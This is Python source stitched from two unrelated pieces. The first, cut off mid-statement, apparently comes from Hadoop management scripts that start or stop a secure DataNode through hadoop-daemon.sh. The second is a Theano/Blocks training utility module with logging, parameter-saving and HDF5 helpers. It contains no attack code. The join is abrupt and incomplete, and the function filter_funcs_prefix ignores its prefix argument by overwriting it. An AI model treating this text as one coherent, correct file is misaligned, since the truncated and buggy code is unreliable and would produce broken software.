check_stack_feature(StackFeature.DATANODE_NON_ROOT, params.stack_version_formatted)) and \ os.path.isfile(hadoop_secure_dn_pid_file): # We need special handling for this case to handle the situation # when we configure non-root secure DN and then restart it # to handle new configs. 
Otherwise we will not be able to stop # a running instance user = "root" try: check_process_status(hadoop_secure_dn_pid_file) custom_export = { 'HADOOP_SECURE_DN_USER': params.hdfs_user } hadoop_env_exports.update(custom_export) except ComponentIsNotRunning: pass hadoop_daemon = format("{hadoop_bin}/hadoop-daemon.sh") if user == "root": cmd = [hadoop_daemon, "--config", params.hadoop_conf_dir, action, name] if options: cmd += [options, ] daemon_cmd = as_sudo(cmd) else: cmd = format("{ulimit_cmd} {hadoop_daemon} --config {hadoop_conf_dir} {action} {name}") if options: cmd += " " + options daemon_cmd = as_user(cmd, user) if action == "start": # remove pid file from dead process File(pid_file, action="delete", not_if=process_id_exists_command) try: Execute(daemon_c
import os import logging import numpy as np import theano from pandas import DataFrame, read_hdf from blocks.extensions import Printing, SimpleExtension from blocks.main_loop import MainLoop from blocks.roles import add_role logger = logging.getLogger('main.utils') def shared_param(init, name, cast_float32, role, **kwargs):
if cast_float32: v = np.float32(init) p = theano.shared(v, name=name, **kwargs) add_role(p, role) return p class AttributeDict(dict): __getattr__ = dict.__getitem__ def __setattr__(self, a, b):
self.__setitem__(a, b) class DummyLoop(MainLoop): def __init__(self, extensions): return super(DummyLoop, self).__init__(algorithm=None, data_stream=None, extensions=extensions) def run(self): for extension in self.extensions: extension.main_loop = self self._run_extensions('before_training') self._run_extensions('after_training') class ShortPrinting(Printing): def __init__(self, to_print, use_log=True, **kwargs): self.to_print = to_print self.use_log = use_log super(ShortPrinting, self).__init__(**kwargs) def do(self, which_callback, *args): log = self.main_loop.log # Iteration msg = "e {}, i {}:".format( log.status['epochs_done'], log.status['iterations_done']) # Requested channels items = [] for k, vars in self.to_print.iteritems(): for shortname, vars in vars.iteritems(): if vars is None: continue if type(vars) is not list: vars = [vars] s = "" for var in vars: try: name = k + '_' + var.name val = log.current_row[name] except: continue try: s += ' ' + ' '.join(["%.3g" % v for v in val]) except: s += " %.3g" % val if s != "": items += [shortname + s] msg = msg + ", ".join(items) if self.use_log: logger.info(msg) else: print msg class SaveParams(SimpleExtension): """Finishes the training process when triggered.""" def __init__(self, trigger_var, params, save_path, **kwargs): super(SaveParams, self).__init__(**kwargs) if trigger_var is None: self.var_name = None else: self.var_name = trigger_var[0] + '_' + trigger_var[1].name self.save_path = save_path self.params = params self.to_save = {} self.best_value = None self.add_condition(['after_training'], self.save) self.add_condition(['on_interrupt'], self.save) def save(self, which_callback, *args): if self.var_name is None: self.to_save = {v.name: v.get_value() for v in self.params} path = self.save_path + '/trained_params' logger.info('Saving to %s' % path) np.savez_compressed(path, **self.to_save) def do(self, which_callback, *args): if self.var_name is None: return val = 
self.main_loop.log.current_row[self.var_name] if self.best_value is None or val < self.best_value: self.best_value = val self.to_save = {v.name: v.get_value() for v in self.params} class SaveExpParams(SimpleExtension): def __init__(self, experiment_params, dir, **kwargs): super(SaveExpParams, self).__init__(**kwargs) self.dir = dir self.experiment_params = experiment_params def do(self, which_callback, *args): df = DataFrame.from_dict(self.experiment_params, orient='index') df.to_hdf(os.path.join(self.dir, 'params'), 'params', mode='w', complevel=5, complib='blosc') class SaveLog(SimpleExtension): def __init__(self, dir, show=None, **kwargs): super(SaveLog, self).__init__(**kwargs) self.dir = dir self.show = show if show is not None else [] def do(self, which_callback, *args): df = DataFrame.from_dict(self.main_loop.log, orient='index') df.to_hdf(os.path.join(self.dir, 'log'), 'log', mode='w', complevel=5, complib='blosc') def prepare_dir(save_to, results_dir='results'): base = os.path.join(results_dir, save_to) i = 0 while True: name = base + str(i) try: os.makedirs(name) break except: i += 1 return name def load_df(dirpath, filename, varname=None): varname = filename if varname is None else varname fn = os.path.join(dirpath, filename) return read_hdf(fn, varname) def filter_funcs_prefix(d, pfx): pfx = 'cmd_' fp = lambda x: x.find(pfx) return {n[fp(n) + len(pfx):]: v for n, v in d.iteritems() if fp(n) >= 0}